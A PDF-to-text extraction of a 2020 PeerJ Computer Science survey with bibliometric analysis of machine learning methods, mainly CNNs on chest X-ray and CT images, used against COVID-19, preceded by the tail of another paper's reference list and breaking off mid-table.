aspects in chemistry and physics. Hoboken: Wiley. Zienkiewicz O, Taylor R, Zhu J. 2013. The finite element method: its basis and funda- mentals. Seventh edition. Oxford: Butterworth-Heinemann. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 27/27 https://peerj.com https://mathics.github.io/ http://quameon.sourceforge.net/ http://www.sagemath.org http://octave.sourceforge.net/symbolic https://github.com/symengine/symengine http://www.sympygamma.com/ http://www.sympygamma.com/ https://github.com/JuliaPy/SymPy.jl http://www.vttoth.com/CMS/index.php/technical-notes/67 http://dx.doi.org/10.1088/0067-0049/192/1/9 http://dx.doi.org/10.7717/peerj-cs.103 work_zg4qriee75dphc3uvx6own7gka ---- Early survey with bibliometric analysis on machine learning approaches in controlling COVID-19 outbreaks Early survey with bibliometric analysis on machine learning approaches in controlling COVID-19 outbreaks Haruna Chiroma1, Absalom E. Ezugwu2, Fatsuma Jauro3, Mohammed A. Al-Garadi4, Idris N. Abdullahi5 and Liyana Shuib6 1 Future Technology Research Center, National Yunlin University of Science and Technology, Yulin, Taiwan 2 School of Mathematics, Statistics, and Computer Science, University of KwaZulu-Natal, KwaZulu-Natal, South Africa 3 Department of Computer Science, Faculty of Science, Ahmadu Bello University, Zaria, Nigeria 4 Department of Biomedical Informatics, Emory University, Atlanta, GA, USA 5 Department of Medical Laboratory Science, College of Medical Sciences, Ahmadu Bello University, Zaria, Nigeria 6 Department of Information System, Universiti Malaya, Kuala Lumpur, Malaysia ABSTRACT Background and Objective: The COVID-19 pandemic has caused severe mortality across the globe, with the USA as the current epicenter of the COVID-19 epidemic even though the initial outbreak was in Wuhan, China. Many studies successfully applied machine learning to fight COVID-19 pandemic from a different perspective. To the best of the authors’ knowledge, no comprehensive survey with bibliometric analysis has been conducted yet on the adoption of machine learning to fight COVID-19. Therefore, the main goal of this study is to bridge this gap by carrying out an in-depth survey with bibliometric analysis on the adoption of machine learning-based technologies to fight COVID-19 pandemic from a different perspective, including an extensive systematic literature review and bibliometric analysis. Methods: We applied a literature survey methodology to retrieved data from academic databases and subsequently employed a bibliometric technique to analyze the accessed records. Besides, the concise summary, sources of COVID-19 datasets, taxonomy, synthesis and analysis are presented in this study. It was found that the Convolutional Neural Network (CNN) is mainly utilized in developing COVID-19 diagnosis and prognosis tools, mostly from chest X-ray and chest CT scan images. Similarly, in this study, we performed a bibliometric analysis of machine learning-based COVID-19 related publications in the Scopus and Web of Science citation indexes. Finally, we propose a new perspective for solving the challenges identified as direction for future research. We believe the survey with bibliometric analysis can help researchers easily detect areas that require further development and identify potential collaborators. Results: The findings of the analysis presented in this article reveal that machine learning-based COVID-19 diagnose tools received the most considerable attention from researchers. Specifically, the analyses of results show that energy and resources are more dispenses towards COVID-19 automated diagnose tools while COVID-19 drugs and vaccine development remains grossly underexploited. Besides, the machine learning-based algorithm that is predominantly utilized by researchers in developing the diagnostic tool is CNN mainly from X-rays and CT scan images. How to cite this article Chiroma H, Ezugwu AE, Jauro F, Al-Garadi MA, Abdullahi IN, Shuib L. 2020. Early survey with bibliometric analysis on machine learning approaches in controlling COVID-19 outbreaks. PeerJ Comput. Sci. 6:e313 DOI 10.7717/peerj-cs.313 Submitted 26 July 2020 Accepted 15 October 2020 Published 23 November 2020 Corresponding author Absalom E. Ezugwu, ezugwua@ukzn.ac.za Academic editor Ahmed Elazab Additional Information and Declarations can be found on page 38 DOI 10.7717/peerj-cs.313 Copyright 2020 Chiroma et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.313 mailto:ezugwua@�ukzn.�ac.�za https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.313 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Conclusions: The challenges hindering practical work on the application of machine learning-based technologies to fight COVID-19 and new perspective to solve the identified problems are presented in this article. Furthermore, we believed that the presented survey with bibliometric analysis could make it easier for researchers to identify areas that need further development and possibly identify potential collaborators at author, country and institutional level, with the overall aim of furthering research in the focused area of machine learning application to disease control. Subjects Bioinformatics, Artificial Intelligence, Data Mining and Machine Learning Keywords Bibliometric analysis, Convolutional neural network, COVID-19 pandemic, COVID-19 diagnosis tool, Machine learning INTRODUCTION The novel 2019 coronavirus disease pandemic emerged on December 12, 2019, and the Chinese government announced the isolation of new types of coronavirus on January 7, 2020 (Imai et al., 2020). This virus was code-named as COVID-19 by the World Health Organization (WHO) on January 12, 2020. However, it was renamed to Severe Acute Respiratory Syndrome Coronavirus-2 (SARS-CoV-2) by the international committee on the taxonomy of the virus (Gorbalenya, 2020). Since the pandemic, the number of confirmed cases as of October 10, 2020 reached 36,616,555 with 1,063,429 recorded fatalities. According to the origin of the first confirmed case report, the infection’s transmission was from animal to human, that is, zoonotic agent (Read et al., 2020). The virus has extended beyond China to other continents of the world (Wang et al., 2020a). The rise in the number of cases in Wuhan and other countries after the evacuation of the cases and closure of the marketplace in Wuhan shows a secondary transmission between humans. Related to the severe acute respiratory syndrome (SARS), the COVID-19 pandemic occurred during the China spring festival, the most famous celebration in China that attracted about 3 million Chinese people who traveled throughout the country. This festival period might have created an avenue for the transmission of this contiguous disease, making its prevention and control very difficult. The report on the secondary cases was made approximately 10 days after the first outbreak of the virus. These new patients were infected through human-to-human transmission because they never had any contact with the Wuhan marketplace, the origin of the first case of the pandemic (Read et al., 2020). The first non-Chinese infected case that spread over the provinces of China and then to the continents of Asia was reported on January 13, 2020, without any connection to the epidemiology at the market place in Wuhan (Hui et al., 2020). Subsequently, the spread continued, and various cases from countries abroad, such as the USA, Italy, and France began to be reported (Holshue et al., 2020). Human-to-human transmission usually occurs in the case of close contact between humans. Restricting human-to-human spread is crucial for decreasing secondary infections among healthcare workers and close contact. The WHO recommended Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 2/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ infection control interventions to reduce the risk of the general spread of acute respiratory diseases such as avoiding close contact with infected patients, frequent washing of hands in case of contact with ill people, and avoiding unprotected contacts with wild or farm animals. People suffering from the acute respiratory infection should always observe cough etiquette by maintaining distancing, covering their cough, sneezing with disposable tissues, and washing their hands frequently. Within the healthcare system, equipment improved standard infection control and prevention practices are recommended, especially in the hospital emergency unit (World Health Organization, 2020). Progressively, an interim clinical guideline has been established by the US Center for Disease Control and Prevention for the COVID-19 pandemic to place control measures and reduce the spread of SARS-CoV-2 in the USA (Patel & Jernigan, 2020). In minimizing the devastating effect of the COVID-19 pandemic and fighting the virus, the timely processing of COVID-19 data analytics is highly critical. The data can come from different aspects such as the patients, fractionated into molecular, society, and population, which can help in the prevention and treatment of COVID-19 (Park et al., 2020). Machine learning is one of the major technologies in combatting COVID-19 (Elavarasan & Pugazhendhi, 2020; Kumar, Gupta & Srivastava, 2020). Much effort based on synergy from the machine learning and biomedical research community is ongoing to develop different approaches to combat the disease. Ongoing efforts include the screening of patients, detection and monitoring of patients, development of drugs, repurposing of drugs to treat patients with COVID-19, predicting the protein structure related to COVID-19, COVID-19 diagnostic systems, COVID-19 vaccine development, and analyzing personalized therapeutic effects for the evaluation of new patients (Alimadadi et al., 2020). The overall goal of these disease control techniques is to prevent the spread; track confirmed cases, recoveries, and mortality; and predict future pandemics (Vaishya et al., 2020). Many studies adopted machine learning to fight the COVID-19 pandemic from a different perspective. A systematic literature review of published and preprinted reports on prediction models for diagnosing COVID-19 was reported. Prediction models were found floating the academic literature very rapidly to help in diagnosing COVID-19 and making critical medical decisions (Wynants et al., 2020). However, the major issue with the work is that it uses preprint publication that has not been validated by peer review. The review is not specific to machine learning for COVID-19. Sources of COVID-19 datasets that can guide researchers access different data for studies on COVID-19 are absent. The study is limited to the diagnosis and prognosis of COVID-19. A comprehensive taxonomy on the prediction tools to show the area that needs improvement is missing in the survey. Bibliometric analysis is not integrated into the study. Similar bibliometric analyses have been reported in the literature as presented by Chahrour et al. (2020), Hossain (2020), and Lou et al. (2020). However, these existing analyses differ from the current bibliometric analysis in this study because the current analysis result focuses on the application of machine learning techniques to combat COVID-19 pandemic as opposed to various literature reporting general medical practices on COVID-19. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 3/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ In this study, we propose to conduct a dedicated comprehensive survey on the adoption of machine learning to fight the COVID-19 pandemic from a different perspective, including an extensive literature review and a bibliometric analysis. To the best of our knowledge, this study is the first comprehensive analysis of research output focusing on several possible applications of machine learning techniques for mitigating the worldwide spread of the ongoing COVID-19 pandemic. We are mindful that other publications might not be captured in our scope because the current study is only limited to the eight academic databases mentioned in Table 1. We are also very dependent on the indexing of the databases used, which is akin to any other bibliometric research study. Other sections of the study are organized as follows: “Methodology” presents the methodology for the survey. “Theoretical Background of Machine Learning Algorithms” presents the rudiments of the major machine learning algorithms used in fighting the COVID-19 pandemic. “COVID-19 Machine Learning Adoption-Oriented Perspective” presents the adoption of machine learning to fight COVID-19. “COVID-19 Datasets” unravels the different sources of COVID-19 datasets. “Survey and Bibliometric Analysis” discusses the survey and bibliometric analysis. “Challenges and Future Research Opportunities” unveils challenges and future research directions before the conclusion in “Conclusions”. Figure 1 presents the visual structure of the survey article, which is similar to the work in (Mohammadi et al., 2018). METHODOLOGY This section presents the protocol followed to survey the adoption of machine learning in fighting COVID-19. The survey was performed based on a systematic literature review procedure in computer science given by Weidt & Silva (2016). The search keywords, techniques, data sources, databases, and inclusion/exclusion criteria used are discussed. Search keywords Initial search keywords were carefully selected based on the defined research goal. After an initial search, multiple keywords were formulated from new words found in several relevant articles. The keywords were later reduced to suit the objective of the research. The keywords used for the study included “deep learning, COVID-19,” “convolutional neural network, COVID-19,” “long short term memory, COVID-19,” “artificial neural network, COVID-19,” “machine learning, COVID-19,” “decision tree, COVID-19,” “COVID-19 diagnosis tool,” and “COVID-19 decision support system.” Data sources The defined search keywords were used to retrieve relevant journal articles and conference papers published by prominent peer-reviewed journals indexed in various academic databases. Table 1 shows the different academic databases used to obtain articles for the survey. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 4/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Article inclusion/exclusion criteria Inclusion/exclusion criteria were set up based on the research aim to decide which articles are eligible for the next review stage. Articles that meet the inclusion criteria were considered relevant for the research, and those that do not meet the inclusion criteria were excluded. The set inclusion/exclusion criteria are provided in Table 2. Article selection Article selection for this research followed a three-stage analysis. The first analysis stage considered only the titles and abstracts of the articles to extract relevant articles. Table 1 Academic databases. Academic database Link DBLP http://dblp.uni-trier.de/ ACM digital library http://dl.acm.org/ IEEEXplore https://ieeexplore.ieee.org/ Sciencedirect http://www.sciencedirect.com/ Springerlink https://link.springer.com/ PubMed https://pubmed.ncbi.nlm.nih.gov/ Scopus https://www.scopus.com/ Web of science https://apps.webofknowledge.com/ Figure 1 Graphical representation of the survey structure. Full-size DOI: 10.7717/peerj-cs.313/fig-1 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 5/45 http://dblp.uni-trier.de/ http://dl.acm.org/ https://ieeexplore.ieee.org/ http://www.sciencedirect.com/ https://link.springer.com/ https://pubmed.ncbi.nlm.nih.gov/ https://www.scopus.com/ https://apps.webofknowledge.com/ http://dx.doi.org/10.7717/peerj-cs.313/fig-1 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ The second analysis stage considered the analysis of the abstract, introduction, and conclusion to refine the selection in the first stage. At the third and final analysis stages, articles were read thoroughly, and a threshold was set to rate the quality of articles in terms of their relevance to the research. A article was selected if it reported an empirical application of machine learning to fight COVID-19 similar to Rodriguez-Morales et al. (2020). Articles that met the threshold value were selected, and those below the threshold were dropped. Figure 2 shows the total number of articles obtained from the academic databases and the final number of articles considered for the research after applying all the extraction criteria. Bibliometric protocol VOSviewer software was used to present a bibliometric analysis of the existing literature on COVID-19. VOSviewer software is a tool for constructing and visualizing bibliometric maps of items, such as journals, research, or individual publications. These maps can be created based on citation, bibliographic coupling, co-citation, or co-authorship relations. The bibliometric analysis software also offers text mining functionality that can Table 2 Article inclusion/exclusion criteria. Inclusion criteria Exclusion criteria The review only focuses on COVID-19 Other viral infections and health issues were not considered relevant in the survey Only articles that applied machine learning techniques to fight COVID-19 were considered Articles using techniques other than machine learning techniques were excluded Articles/conference papers published by prominent and indexed journals were included Articles/conference papers published by non-indexed journals were excluded. The article uploaded as a preprint in preprint servers such as bioRxiv, medRxiv, arXiv, etc. without peer review were excluded Only articles written in the English language were considered for inclusion Articles written in languages other than English were excluded Figure 2 Article selection process. Full-size DOI: 10.7717/peerj-cs.313/fig-2 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 6/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-2 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ be used to construct and visualize co-occurrence networks of important terms extracted from a body of scientific literature (see www.vosviewer.com). We only used 1,178 publications with the keyword “novel coronavirus” and 98 publications with the keyword “COVID-19 and artificial intelligence” that were retrieved from Scopus and Web of Science academic databases for the bibliometric analysis presented in this study. Only 57 document results were extracted using the keyword “COVID-19 and machine learning” from the same academic database. Articles from other sources were not considered because most of these publications have not been peer-reviewed and are not available online in the form of preprint publications. THEORETICAL BACKGROUND OF MACHINE LEARNING ALGORITHMS Numerous machine learning algorithms exist in the literature. In this section, we discuss the basic operations of the major machine learning algorithms used in fighting the COVID-19 pandemic to provide the readers with a basic concept of how the algorithms operate in achieving their goal, especially novice researchers, thus making the study self-contained. The main algorithms include artificial neural network (ANN), convolutional neural network (CNN), and long short term memory (LSTM). Artificial neural network Artificial neural network is a machine learning algorithm designed to emulate the human brain. Similar to neurons in the human brain, ANN consists of interconnected nodes. A given ANN consists of three essential components, namely, node (neuron) character, network topology, and several learning rules (Livingstone, 2008). Signal processing strategy involving the number of inputs and outputs associated with a node, the weight of each input and output, and the activation function are all determined by the node character. The organization of the nodes and the interconnection between them are determined by the network architecture, which usually consists of three underlying layers (input, output, and hidden layers). Learning is employed to train the network. The learning rules decide on weight initialization and adjustment. An ANN is said to have learnt if it can process probabilistic, fuzzy, noisy, and vague data with an insignificant negative effect on the output quality, and generalize acquired knowledge to unknown tasks (Basheer & Hajmeer, 2000). A basic ANN model consists of multiple nodes such that every node receives multiple inputs from other nodes through connections having associated weights. The weighted sum of the inputs is passed through a threshold gate. The node is activated and transmits the output to another node only if the weighted sum of its input exceeds the threshold (Basheer & Hajmeer, 2000). Convolutional neural network Convolutional neural network is the most commonly used deep learning algorithm (Haque & Neubert, 2020). It is a discriminative deep learning algorithm formed by a stack of multiple convolutional and pooling layers (Deng, 2014). The major strength of CNN lies Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 7/45 https://www.vosviewer.com http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ in its ability to perform parameter sharing, sparse interaction, and equal representation. The network is faster and easier to train due to its utilization of local connections and sharing of weights (Pouyanfar et al., 2018). A typical CNN receives an image as its input and has neurons arranged in a 3D form connecting to only a portion of the previous layer (Haque & Neubert, 2020). The architecture of CNN is presented in series of stages, where the first stages consist of convolution and pooling layers, and the final stage is composed of a fully connected layer (Lecun, Bengio & Hinton, 2015). Convolutional neural network receives 3D input x in the form m � m � r, where m is the height and width of the input, and r is the channel number, for example, in RGB r ¼ 3. The convolution layer has several filters known as kernels k with a size of n � n � q where n < x and q � r. The kernels share the same parameters of weight (Wk) and bias (bk). During convolution, k feature maps are generated (hkh), each having size m � n � 1. The convolution layer finds the dot product between w and input x, and applies activation function f to the output expressed as (Pouyanfar et al., 2018): hk ¼ f Wk � x þ bk � � . The pooling layer prevents overfitting and hastens training by reducing the length of the feature map (Pouyanfar et al., 2018; Zhao et al., 2019). Maximum and average pooling are the widely applied pooling methods. Finally, the fully connected SoftMax layers are deployed for prediction (Zhao et al., 2019). Long short term memory The LSTM deep learning network is a type of recurrent neural network that can recall data features over several intervals of time (Liu et al., 2019). It was developed to solve the vanishing gradient weakness of the recurrent neural network (Karim et al., 2018). The hidden layers of LSTM are treated as memory cells, making the network powerful in handling long- and short-term correlation in a time series (Zhao et al., 2017). The earliest version of LSTM contained memory cells, and input and output gates with no forget gate; the forget gate was later deployed to enable continual learning of tasks by resetting the state of the LSTM (Greff et al., 2016). Its updated architecture consists of multiple LSTM units with each unit having an input gate, a forget gate, an output gate, and a memory cell. Sak, Senior & Beaufays (2014) described the underlying architecture of LSTM as consisting of memory blocks in its hidden layer. The memory blocks have memory cells for the storage of the temporal state of the network with additional units, known as gates, to supervise the information flow. A memory cell has an input gate that manages the inflow of input activations to the memory cell and an output gate to manage the outflow of cell activations to the network. The forget gate is incorporated to forget or reset the memory of the cell adaptively. LSTM computes mapping iteratively at a timestamp t ¼ 1 to T with an input sequence x ¼ x1; x2; . . . ; xr � � and an output sequence y ¼ ðy1; y2; . . . ; yrÞ. LSTM is good at addressing complex sequential machine learning problems (Karim et al., 2018). Deep LSTM architectures consist of stacked LSTM layers (Sak, Senior & Beaufays, 2014). LSTMs are strong in handling temporal dependencies in sequences but weak in dealing with long sequence dependencies (Karim et al., 2018). Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 8/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ COVID-19 MACHINE LEARNING ADOPTION-ORIENTED PERSPECTIVE In the fight against COVID-19, different aspects of artificial intelligence (AI) were applied to curtail its adverse effect (Dananjayan & Raj, 2020). The taxonomy in Fig. 3 was created from the project that involved machine learning in fighting COVID-19. The data used in creating the taxonomy were extracted from the articles that applied the machine learning algorithm to fight COVID-19. COVID-19 diagnostic tools Currently, the sensitivities for reverse transcription-polymerase chain reaction (RT–PCR)- based viral nucleic acid assay are used as the reference standard method to confirm COVID-19 infection (Corman et al., 2020). However, such a laboratory test is time consuming, and the supply of test kits may be the bottleneck for a rapidly growing suspicious population even for many developed countries such as the USA. More importantly, initial false-negative or weakly positive RT–PCR test results were found in Figure 3 Taxonomy of the machine learning algorithms adopted in fighting COVID-19. Full-size DOI: 10.7717/peerj-cs.313/fig-3 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 9/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-3 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ several later-confirmed cases, while highly suspicious computed tomography (CT) imaging features were present (Xu et al., 2020; Xie et al., 2020). The treatment and screening of COVID-19 can be more effective when deep learning approach, CT features, and real-time RT–PCR results are integrated (Li et al., 2020a). AI and deep learning can assist in developing diagnostic tools and deciding on treatment (Rao & Vazquez, 2020; Shi et al., 2020). As a result, many diagnostic tools were developed based on the machine learning algorithm to fight COVID-19. For example, Apostolopoulos & Mpesiana (2020) applied transfer learning with CNN to detect COVID-19 from X-ray images containing common bacterial pneumonia and normal incidents and established COVID-19 infection. Transfer learning CNN was used to diagnose COVID-19 cases from X-ray datasets. The results indicated that VGG19 diagnosed COVID-19 confirmed cases with better accuracy on two- and three-classification problems compared with MobileNet v2, Inception, Xception, and Inception ResNet v2. The proposed approach can help develop a cost-effective, fast, and automatic COVID-19 diagnostic tool, and reduce the exposure of medical workers to COVID-19. Similarly, Rahaman et al. (2020) developed an automated computer-aided diagnosis (CAD) system for the detection of COVID-19 samples from healthy cases and cases with pneumonia using chest X-ray (CXR) images. Their study demonstrated the effectiveness of applying deep transfer learning techniques for the identification of COVID-19 cases using CXR images. Ardakani et al. (2020) were motivated by the time consumption and high cost of the traditional medical laboratory COVID-19 test to investigate the performance of 10 well-known CNNs in diagnosing COVID-19. The 10 variants of CNN included VGG-16, AlexNet, Xception, VGG-19, ResNet-101, SqueezeNet, ResNet-50, GoogleNet, MobileNet-V2, and ResNet-18. All the CNN variants were applied on CT scan images because the CT slice is a fast method of diagnosing patients with COVID-19. The diagnostic results of the CNN variants indicated that ResNet-101 and Xception outperformed the other CNN variants in diagnosing COVID-19. They concluded that ResNet-101 has a high sensitivity in characterizing and diagnosing COVID-19 infections. Therefore, it can be used as an alternative tool in the department of radiology for diagnosing COVID-19 infection. It is cheaper and faster compared with traditional laboratory analysis. Butt et al. (2020) applied CNN for the detection of COVID-19 from the chest CT scan of patients. CNN was found very fast and reliable in the detection of COVID-19 from a chest CT scan compared with the conventional RT–PCR testing. In summary, the CNN model is fast and reliable in detecting COVID-19 infection. Huang et al. (2020b) applied a deep learning algorithm on a chest CT scan of a patient with COVID-19 to quantify lung burden changes. The patients with COVID-19 were grouped into mild, moderate, severe, and critical based on findings from the chest CT scan, clinical evaluation, and laboratory results. Deep learning algorithm was applied to assess the lung burden changes. They found that the assessment of lung opacification measured on the chest CT scan substantially differed from that of the clinical groups. The approach can remove the subjectivity in the initial assessment of COVID-19 findings. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 10/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Mei et al. (2020) proposed a joint model comprising CNN, support vector machine (SVM), random forest (RF), and multilayer perceptron integrated with chest CT scan result and non-image clinical information to predict COVID-19 infection in a patient. CNN was run on the CT image, while the other algorithms classified COVID-19 using the non-image clinical information. The output of the CNN and the different algorithms were combined to predict the patient’s COVID-19 infection. The diagnostic tool can rapidly detect COVID-19 infection in patients. Liu et al. (2020a) used logistic regression for the prediction of COVID-19 infection sliding to the severity of the COVID-19 cohort. The results of the study showed that the CT quantification for the pneumonia lesions could predict the progression of a patient with COVID-19 to a severe stage at an early, non-invasive level. This situation can provide a prognostic indicator for coronavirus clinical management. Jiang et al. (2020) applied a machine learning algorithm to predict COVID-19 clinical severity. They developed a predictive tool that predicts patients at risk for increased COVID-19 severity at the first presentation. The survey can help in the optimal utilization of scarce resources to cope with the COVID-19 pandemic. Hurt, Kligerman & Hsiao (2020) collected CXR images from patients with COVID-19 in China and America. They applied a deep learning algorithm for the early diagnosis of COVID-19 from the CXR. They found that deep learning predicted and consistently localized areas of pneumonia. The deep learning algorithm can diagnose a patient’s COVID-19 infection early. Loey, Smarandache & Khalifa (2020) were motivated by the insufficient COVID-19 dataset to propose a generative adversarial network (GAN) and CNN variant to detect COVID-19 in patients. GAN was used to generate more X-ray images. Googlenet, Alexnet, and ResNet18 were applied as the deep transfer learning models. They found that Googlenet and Alexnet scored 80.6%, 85.2%, and 100%, respectively, in the four-, three-, and two-class classification problem, respectively. The study’s method can facilitate the early detection of COVID-19 and reduce the workload of a radiologist. Wu et al. (2020) proposed a multi-view ResNet50 for the screening of COVID-19 from chest CT scan images. ResNet50 was trained with the multi-view chest CT scan images. The results showed that the multi-view ResNet50 fusion achieved a high performance compared with the single view. The diagnosis tool developed can reduce the workload of a radiologist by offering fast, accurate COVID-19 diagnosis. Ucar & Korkmaz (2020) developed a rapid COVID-19 diagnosis tool from X-ray images based on SqeezeNet (a pre-defined CNN) and the Bayesian optimization method. The SqueezeNet hyperparameters were optimized using the Bayesian optimization method. Bayesian optimization-based SqueezeNet was applied to detect COVID-19 from X-ray images labeled normal, pneumonia, and COVID-19. Bayesian-based SqueezeNet outperformed the baseline diagnostic tools. Toğaçar, Ergen & Cömert (2020) applied CNN for the exploitation of social mimic and CXR based on fuzzy color and the stacking method to diagnose COVID-19. The stacked data were trained using CNN, and the features obtained were processed with mimicking social optimization. The compelling features were used for classification into COVID-19, pneumonia, and standard X-ray imagery using SVM. Singh et al. (2020) used CNN and multi-objective differential evolution (MODE) for the early detection of Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 11/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ COVID-19 from a chest CT scan image. The initial parameters of the CNN were tuned using MODE to create a MODE-based CNN and classify patients with COVID-19 based on positive or negative chest CT scan images. MODE-based CNN outperformed the competitive models (ANN, ANFIS, and traditional CNN). The proposed method is beneficial for COVID-19 real-time classification owing to its speed in diagnosing COVID-19. Salman et al. (2020) constructed a CNN-based COVID-19 diagnostic tool for the detection of COVID-19 from CXR images. CNN–inceptionV3 was applied to detect COVID-19 from 130 X-ray images of patients infected with COVID-19 and 130 normal X-ray images. The results indicated that CNN–inceptionV3 could detect COVID-19 from the X-ray images and reduce the testing time required by a radiologist. Ozturk et al. (2020) used CNN to develop an automated tool for diagnosing COVID-19 from raw CXR images. Binary and multi-class categories were experimented on using a CNN with 17 convolution layers with a different filter on each convolution layer. The model can be used for the early screening of patients with COVID-19 and assist the radiologist in validating COVID-19 screening. Li et al. (2020b) developed an automated framework based on CNN for the detection of COVID-19 from chest CT scan and differentiate it from community-acquired pneumonia. The study collected data from 3,322 patients comprising 4,356 chest CT scans. CNN was applied to detect patients with COVID-19 and typical community pneumonia. The experiment results showed that CNN can distinguish patients with COVID-19 from those with community-acquired pneumonia and other similar lung diseases. The proposed framework automated the COVID-19 testing and reduced the testing time and fatigue. Yang et al. (2020a) applied densely connected convolutional networks optimized with stochastic gradient descent algorithm for the detection of COVID-19 from chest CT scan images. Oh, Park & Ye (2020) applied patch-based CNN–ResNet-18 (P-CNN) due to lack of sufficient training data for diagnosing COVID-19 from CXR images. The study used imaging biomarkers of the CXR radiographs. P-CNN ResNet-18 was applied, and P-CNN produced clinically salient maps that are useful in diagnosing COVID-19 and patient triage. P-CNN ResNet-18 achieved the best result compared with the baselined algorithm performance. The limited amount of data can be used for COVID-19 diagnoses and were interpretable. Table 3 summarizes the diagnostic tools developed based on machine learning. Refer to Dong et al. (2020) for an engaging research review on the role of imaging in the detection and management of COVID-19 disease spread. COVID-19 decision support system The decision support system related to COVID-19 can help decision/policymakers formulate policy to curtail COVID-19. Many COVID-19 decision support systems were developed based on machine learning approaches. For example, Ayyoubzadeh et al. (2020) applied LSTM and linear regression to predict the number of positive cases in Iran. LSTM and linear regression were used on Google search data to predict the COVID-19 cases in Iran. The results indicated that linear regression outperforms LSTM in predicting the positive cases of COVID-19. The algorithm can predict the trend of the COVID-19 pandemic in Iran, which can help policymakers plan the allocation of medical resources. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 12/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Chimmula & Zhang (2020) applied deep LSTM for forecasting COVID-19 transmission and possible COVID-19 ending period in Canada and other parts of the world. The transmission rate of Canada was compared with that of Italy and the USA. The future outbreak of the COVID-19 pandemic was predicted to help Canadian decision makers monitor the COVID-19 situation and prevent the future transmission of the epidemic in Canada. Liu et al. (2020b) proposed ANN in modeling the trend of COVID-19 and restoring the operational capability of medical services in China. ANN was used for modeling the pattern of COVID-19 in Wuhan, Beijing, Shanghai, and Guangzhou. Autoregressive Integrated Moving Average (ARIMA) was applied for the estimation of nonlocal hospital demands for the period of COVID-19 pandemic in Beijing, Shanghai, and Guangzhou. The results indicated that the number of people infected with COVID-19 would increase by 45%, while death would increase by 567%. COVID-19 will reach its peak by March 2020 and toward the end of April 2020. This finding will assist policymakers and health officials in planning to deal with challenges of the unmet medical requirement of other diseases during the COVID-19 pandemic. Pirouz et al. (2020) proposed a group method of data handling in a neural network to predict the number of COVID-19 confirmed cases based on weather conditions. The dominant weather condition used included temperature, city density, humidity, and wind speed. The results indicated that humidity and temperature have a substantial influence on COVID-19 confirmed cases. Temperature and humidity influence COVID-19 negatively and positively, respectively. These results can be used by decision makers to manage the COVID-19 pandemic. Yang et al. (2020b) applied LSTM to predict the COVID-19 trend in China. The prediction model indicated that the COVID-19 pandemic should peak toward the end of February 2020 and start declining at the end of April 2020. The prediction model can be used by authorities in China to decide in controlling the COVID-19 pandemic. Vaid, Cakan & Bhandari (2020) adopted a machine learning approach to predict COVID-19 potential infections based on reported cases in North America. Critical parameters were identified from dimension reduction. Passed diseases were inferred from recent fatalities using a hierarchical Bayesian estimator. The model predicted potential COVID-19 infections in North America. Policymakers in North America can use the projection to curtail the effect of the COVID-19 pandemic. Tuli et al. (2020) developed a machine learning COVID-19 predictive model and deployed it in the cloud computing environment for real-time tracking of COVID-19, predicting the growth and potential thread of COVID-19 in different countries worldwide. Government and citizens can use the results for proactive measures to fight COVID-19. Tiwari, Kumar & Guleria (2020) used a machine learning approach to predict the COVID-19 pandemic number of cases, recoveries, and deaths in India based on data from China. The prediction results indicated that COVID-19 would peak between the third and fourth week of April 2020. The Indian government can use the study to formulate policies and decide on mitigating the spread of COVID-19. Ribeiro et al. (2020) evaluated six machine learning algorithms, namely, Cubis regression (CUBIST), RF, ridge regression (RIDGE), support vector regression (SVR), ARIMA, and stacking-ensemble Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 13/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Table 3 The summary of the COVID-19 diagnostic tools based on machine learning algorithms. Reference Algorithm Performance Contribution Benefit Apostolopoulos & Mpesiana (2020) Transfer Learning with CNN Accuracy: 98.75% Device approach for automatic diagnostic of COVID-19 based on X-ray Cost-effective, fast diagnosis and reduce exposure of medical workers to COVID-19 Sensitivity: 92.85% Specificity: 98.75% Ardakani et al. (2020) Variants of CNN ResNet 101 Accuracy: 99.51% Automated characterization and diagnosis of COVID-19 infection. Cheaper and faster compared to the traditional laboratory analysis of COVID-19. Reduces medical worker’s workload. Sensitivity: 100% Specificity: 99.02% Butt et al. (2020) CNN AUC: 0.996 Outperform the traditional RT-PCR testing of COVID- 19 fast and reliable in detecting COVID-19 pandemic.Sensitivity: 98.2% Specificity: 92.2%. Huang et al. (2020b) Deep learning algorithm Not Applicable as a result of ANOVA analysis The assessment of the lung opacification measured is significantly different 